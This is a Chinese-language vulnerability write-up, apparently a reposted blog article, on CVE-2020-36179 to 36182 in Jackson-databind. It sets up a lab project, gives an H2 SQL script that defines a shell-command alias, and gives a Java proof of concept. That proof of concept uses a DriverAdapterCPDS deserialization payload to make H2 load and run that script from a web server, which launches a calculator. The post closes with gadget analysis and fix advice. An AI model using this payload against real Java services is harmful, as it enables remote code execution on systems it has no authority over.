CVE-2020-36179/80/81/82:Jackson-databind SSRF&RCE)

影响范围

Jackson-databind < 2.9.10.7

漏洞类型

JDNI注入导致RCE

利用条件

  • 开启enableDefaultTyping()

  • 使用了org.apache.servicemix.bundles第三方依赖库

漏洞概述

以下类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE:

  • CVE-2020-36179:org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS

  • CVE-2020-36180:  org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS

  • CVE-2020-36181:  org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS

  • CVE-2020-36182:  org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS

漏洞复现

环境搭建

pom.xml

<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><project xmlns=\\\"http://maven.apache.org/POM/4.0.0\\\"         xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\"         xsi:schemaLocation=\\\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\\\">    <modelVersion>4.0.0</modelVersion>
<groupId>com.jacksonTest</groupId> <artifactId>jacksonTest</artifactId> <version>1.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>com.fasterxml.jackson.core</groupId> <artifactId>jackson-databind</artifactId> <version>2.9.10.7</version> </dependency> <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-dbcp2 --> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-dbcp2</artifactId> <version>2.8.0</version> </dependency> <!-- https://mvnrepository.com/artifact/com.h2database/h2 --> <dependency> <groupId>com.h2database</groupId> <artifactId>h2</artifactId> <version>1.4.199</version> </dependency>
<dependency> <groupId>org.slf4j</groupId> <artifactId>slf4j-nop</artifactId> <version>1.7.2</version> </dependency> <!-- https://mvnrepository.com/artifact/javax.transaction/jta --> <dependency> <groupId>javax.transaction</groupId> <artifactId>jta</artifactId> <version>1.1</version> </dependency> </dependencies></project>
漏洞利用

https://github.com/Al1ex/CVE-2020-36179

构造exec.sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\");        return s.hasNext() ? s.next() : \\\"\\\";  }$$;CALL SHELLEXEC(\\\'calc.exe\\\')

简易web服务

python2 -m simpleHTTPServer 4444

执行漏洞POC1

poc.java代码如下所示:

import com.fasterxml.jackson.databind.ObjectMapper;import com.fasterxml.jackson.databind.SerializationFeature;

public class POC { public static void main(String[] args) throws Exception { String payload = \\\"[\\\\\\\"org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS\\\\\\\",{\\\\\\\"url\\\\\\\":\\\\\\\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM \\\'http://127.0.0.1:3333/exec.sql\\\'\\\\\\\"}]\\\"; ObjectMapper mapper = new ObjectMapper(); mapper.enableDefaultTyping(); mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false); Object obj = mapper.readValue(payload, Object.class); mapper.writeValueAsString(obj); }}

之后运行该程序,成功执行命令,弹出计算器:

漏洞分析

org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS类中提供了对url的set方法,可以通过反序列化进行赋值操作,同时在getConnection中通过DriverManager.getConnection()进行远程连接,参数url可控,从而可导致SSRF,当classpath中存在h2数据库时甚至可以导致RCE:

Gadget如下:

DriverAdapterCPDS    ->seturl        ->getPooledConnection            ->DirverManager.getConnection(this.url,username,pass)

修复建议

  • 及时将jackson-databind升级到安全版本(>2.9.10.7)

  • 升级到较高版本的JDK

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34151.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月8日 上午9:13
下一篇 2024年4月8日 上午9:15

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注